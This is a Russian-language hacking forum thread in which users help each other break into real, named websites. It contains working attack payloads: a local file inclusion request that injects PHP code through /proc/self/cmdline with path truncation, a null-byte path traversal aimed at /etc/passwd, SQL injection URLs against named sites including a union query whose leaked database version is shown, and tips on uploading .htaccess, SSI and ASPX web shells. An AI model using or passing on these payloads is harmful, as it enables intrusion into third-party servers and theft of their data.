Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    359
    Likes Received:
    178
    Reputations:
    108


    В первую очередь у пользователя под которым работает веб-сервер непосредственно обрабатывающий PHP скрипты должны быть права на виртуальную файловую ситстему /proc. Во вторых в скрипте в функции инклуда не должно быть препенда вида /xxx.$etc Далее как было указано многоуважаемым Expl0ited не через браузер ибо url-encoded строка делается. Так-же , в скрипте может оказывать влияние какая-либо фильтрация или рекодировка и прочие финты программиста. Естественно magic_quotes Off.
     
  2. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    327
    Likes Received:
    46
    Reputations:
    11
    а через что тогда?
    просто через burp site пробовал не получилось,в нём знак & и после него остальное определяет как новую переменную
    Expl0ited поделись пожалуйста через что ты сделал?
     
  3. Zahar

    Zahar Banned

    Joined:
    17 Mar 2008
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    Думаю curl "запрос" вполне удобная штуковина.
     
  4. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    327
    Likes Received:
    46
    Reputations:
    11
    через curl такаяже ситуация.
    как ещё можно?
     
  5. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,546
    Likes Received:
    173
    Reputations:
    75
    народ а тут, нужно отсеять окончание, нул байт не помогает
    http://proeveryday.ru/index.php?id=../etc/passwd%00
    тут читал /thread98525.html но нифига неполучилось, мб недопонял
    подскажите как правильно
     
  6. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    327
    Likes Received:
    46
    Reputations:
    11
    запрос такой
    Code:
    curl "http://site.com/pid=../../../../../../../../../../../../../../../../../../proc/self/cmdline&<?php print php_uname();?>/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././
    Code:
    curl "http://site.com/pid=../../../../../../../../../../../../../../../../../../proc/self/cmdline/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././&<?php print php_uname();?>
     
    #19826 Faaax, 17 Mar 2012
    Last edited: 17 Mar 2012
    1 person likes this.
  7. Soulk3r

    Soulk3r New Member

    Joined:
    30 Nov 2008
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    + OSVDB-29786: /admin.php?en_log_id=0&action=config: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
    + OSVDB-29786: /admin.php?en_log_id=0&action=users: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.

    Подскажите как мне использовать эту уязвимость ?
    Просто ввести site.ru/admin.php?en_log_id=0&action=config: ничего не делает :(

    И что за ссылка типа с каким-то скриптом или программой ? http://www.webrc.ca
     
  8. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,664
    Likes Received:
    913
    Reputations:
    363
    при заливке php, вылезает 500 ошибка, php[2-5] показываются как текст, а phtml скачивается
    есть какие-нибудь варианты что можно сделать?
     
    _________________________
  9. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,022
    Likes Received:
    524
    Reputations:
    935
    .htaccess
     
    _________________________
  10. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,664
    Likes Received:
    913
    Reputations:
    363
    переименовывает файлы, только расширение оставляет
     
    _________________________
  11. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,546
    Likes Received:
    173
    Reputations:
    75

    блин, чёт так не выходит в первом варианте, окончание не обрезается
    во втром ничего не происходт
     
  12. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    заливай SSI шелл. не раз спасал уже.
     
    2 people like this.
  13. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    327
    Likes Received:
    46
    Reputations:
    11
    вот вот,сам ломаю голову
     
  14. Soulk3r

    Soulk3r New Member

    Joined:
    30 Nov 2008
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Из эксплойта там строчка http://[target]/[path]/admin.php?action=users&en_login_id=0

    перейдя по которой я ничего сделать не могую
    Также описывается что можно редактировать config2.php или любую другую страничку но и этого не могу :(
     
  15. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,664
    Likes Received:
    913
    Reputations:
    363
    OxoTnik, нет, все так же 500
    Boolean, SSI doesn't work:(
     
    _________________________
  16. shadowrun

    shadowrun Banned

    Joined:
    29 Aug 2010
    Messages:
    842
    Likes Received:
    170
    Reputations:
    84
    Code:
    http://www.surbor.su/enicinfo.php?id=22+order+by+100+--+
    не думается...
     
  17. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    shadowrun,
    Code:
    http://www.surbor.su/enicinfo.php?id=22/**/Order/**/by/**/11--+d  true
    
    Делаем запрос:
    Code:
    http://www.surbor.su/enicinfo.php?id=-1+union+all+select+null,@@version,null,null,null,null,null,null,null,null,null,null--
    Code:
        <meta name="description" content="понятие [COLOR=Green]Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) 	May 3 2005 23:18:38 	Copyright (c) 1988-2003 Microsoft Corporation	Developer Edition on Windows NT 5.2 (Build 3790: Service Pack 2)[/COLOR]">

    Soulk3r,
    посмотри phpinfo(); (найди где-нибудь). Rg=on должен быть, чтоб твой exploit сработал.
     
    #19837 Ereee, 18 Mar 2012
    Last edited: 18 Mar 2012
    1 person likes this.
  18. shadowrun

    shadowrun Banned

    Joined:
    29 Aug 2010
    Messages:
    842
    Likes Received:
    170
    Reputations:
    84
    Code:
    http://www.studyguide.ru/schools.php?id=817%27+uni/**/On+Sel/**/Ect+1+--+
    хз :cool:
     
  19. Soulk3r

    Soulk3r New Member

    Joined:
    30 Nov 2008
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Ereee,
    Если не выходит найти phpinfo(); и Эксплойт не пашет значит Rg=off ? и тогда эту багу нельзя юзать ?
     
  20. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,546
    Likes Received:
    173
    Reputations:
    75
    короче такой вопрос, есть возможность залить файл на сервер через mysql на там работают файлы только с разширением aspx, я так понял php скрипт там работать небудет) как тогда быть? есть мож какие шеллы написаные на aspx? ))
     
Thread Status:
Not open for further replies.